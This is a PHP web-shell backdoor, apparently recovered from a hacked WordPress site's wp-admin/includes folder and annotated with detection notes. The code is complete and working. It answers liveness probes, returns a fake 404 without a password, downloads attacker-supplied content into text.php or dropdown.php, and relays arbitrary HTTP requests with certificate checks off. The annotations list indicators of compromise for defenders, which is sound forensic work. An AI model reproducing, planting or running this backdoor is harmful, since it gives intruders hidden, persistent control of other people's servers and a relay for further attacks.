0byt3m1n1
Path: /home1/aserty/www/ourhomebedroom.com/wp-admin/includes/
File: index.php
<?php
// Summary (from the code below): a password-gated script with three behaviours,
// all selected through $_REQUEST parameters:
//   ex  -> liveness reply ("1"), answered before the password check
//   cb  -> read content from a caller-supplied location and write it to
//          text.php or dropdown.php (file dropper)
//   url -> relay an HTTP request through this server with cURL (proxy)
// Strings in this file usable for triage and detection: the hard-coded MD5
// value, the file names text.php / dropdown.php, the default User-Agent
// string, and the "<-- end -->" response trailer.

// Liveness probe. Runs before any authentication, so any request carrying an
// `ex` parameter gets the one-byte body "1".
if(isset($_REQUEST['ex'])){
    exit('1');
}

// Requests without `pw` get an empty 404, which makes the script look absent
// to scanners and casual visitors. In access logs, a 404 on this path
// alongside non-404 replies for requests carrying `pw` is the pattern to
// look for.
if(!isset($_REQUEST['pw'])){
    http_response_code(404);
    exit();
}

// Password gate: MD5 of the supplied `pw` is compared (loose `!=`) with a
// hard-coded digest. The digest is a static string and can serve as a
// file-content indicator when sweeping the web root.
if(md5($_REQUEST['pw'])!='ffc52a7aef7b90a27c1fbaec516a4f0e'){
    exit('pw error');
}

// Dropper branch (`cb`).
if(isset($_REQUEST['cb'])){
    // `cb` is base64-decoded and handed straight to file_get_contents(); the
    // decoded value is not validated here. Whether remote URLs are readable
    // depends on allow_url_fopen - confirm on the host. `@` hides failures.
    $cb = @file_get_contents(base64_decode($_REQUEST['cb']));
    // The output name is one of two fixed, innocuous-looking PHP file names,
    // chosen at random.
    $file_name_arr = ['text.php','dropdown.php'];
    $fid = rand(0,count($file_name_arr)-1);
    // Relative path: resolves against the process working directory -
    // presumably this script's directory under a typical web SAPI; verify.
    // The write result is not checked, and `@` hides failures.
    @file_put_contents($file_name_arr[$fid],$cb);
    // Build the public URL of the written file by replacing the last segment
    // of PHP_SELF with the chosen name. Scheme and host come from
    // REQUEST_SCHEME and HTTP_HOST, i.e. from the incoming request.
    $self = $_SERVER['PHP_SELF'];
    $self_arr = explode('/',$self);
    $cb_url = $_SERVER['REQUEST_SCHEME'].'://'.$_SERVER['HTTP_HOST'].str_replace($self_arr[count($self_arr)-1],$file_name_arr[$fid],$self);
    // The response body is the URL of the dropped file.
    exit($cb_url);
}

// Proxy branch (`url`): everything below relays one HTTP request.
if(!isset($_REQUEST['url'])){
    exit('no url');
}
// Target URL is base64-encoded in the request, so it does not appear in clear
// text in access logs. No scheme or host restriction is applied here.
$url=base64_decode($_REQUEST['url']);
$param = array();
// Optional caller-controlled Accept-Language header (base64 in `al`).
if(isset($_REQUEST['al'])){
    $param[] = "Accept-Language:".base64_decode($_REQUEST['al']);
}else{
    // Default Accept-Language is disabled in the original (commented out).
    //$param[] = "Accept-Language:ja, en-GB; q=0.7,en; q=0.3";
}
// Optional caller-controlled User-Agent (base64 in `ua`); otherwise a fixed
// browser string is sent. Outbound requests from the web server carrying
// this exact string are a network-side indicator.
if(isset($_REQUEST['ua'])){
    $param[] = "User-Agent:".base64_decode($_REQUEST['ua']);
}else{
    $param[] = "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763";
}
// Optional caller-controlled Cookie header (base64 in `ck`).
if(isset($_REQUEST['ck'])){
    $param[] = "cookie:".base64_decode($_REQUEST['ck']);
}
// The fetched body is echoed back, followed by a fixed trailer string.
echo get($url,$param);
exit("<-- end -->");

/**
 * Fetch $url with cURL, sending the header lines in $param, and return the
 * result of curl_exec().
 *
 * CURLOPT_HEADER is 0 and CURLOPT_RETURNTRANSFER is 1, so the response is
 * returned as a string without response headers. Both TLS peer and host
 * verification are switched off, so certificate errors on the target do not
 * stop the request. No timeout, redirect or protocol options are set in this
 * function.
 *
 * @param string $url   Target URL, passed to CURLOPT_URL unchanged.
 * @param array  $param Header lines passed to CURLOPT_HTTPHEADER.
 * @return string|bool  Whatever curl_exec() returns; the value is not checked.
 */
function get($url, $param) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($curl, CURLOPT_HTTPHEADER, $param);
    $data = curl_exec($curl);
    curl_close($curl);
    return $data;
}
?>